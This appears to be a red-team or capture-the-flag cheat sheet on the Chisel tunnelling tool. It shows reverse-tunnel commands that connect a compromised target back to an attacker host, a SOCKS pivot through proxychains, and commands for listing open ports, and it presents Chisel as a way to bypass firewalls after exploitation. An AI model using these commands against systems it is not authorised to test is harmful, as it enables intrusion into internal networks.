🧠 What is Chisel?
Chisel is a fast TCP/UDP tunnel over HTTP, useful for port forwarding and pivoting, especially during red teaming or CTFs.
🔥 Attacker Machine Setup (Chisel Server)
Start Chisel in reverse mode on the attacker machine:
./chisel_1.5.1 server -p 9005 --reverse
-p 9005: Listen on port 9005--reverse: Accept reverse port forwarding connections
🎯 Target Machine Setup (Chisel Client)
Forward all traffic to attacker:
./chisel client 10.10.14.19:9005 R:socks
This sets up a SOCKS proxy from the target to the attacker’s Chisel server
Forward Specific Ports:
./chisel.exe client 127.0.0.1:8001 R:80:localhost:80 R:443:localhost:443 R:8888:localhost:8888 R:9251:localhost:9251
Forwards internal services to the attacker’s machine over Chisel
For Proxychains Usage:
.\chisel.exe client 10.10.14.XX:8005 R:1080:socks
Then configure
proxychains.confwithsocks5 127.0.0.1 1080
📡 Commands to Find Open Ports
🐧 Linux
sudo netstat -tuln
sudo lsof -i -P -n | grep LISTEN
nmap -sT -O localhost
🪟 Windows
netstat -ano | findstr LISTENING
Get-NetTCPConnection | Where-Object {$_.State -eq 'Listen'}
Test-NetConnection -ComputerName localhost -Port 80
🧠 Tip: Chisel is perfect for bypassing firewalls and pivoting to internal networks during post-exploitation!
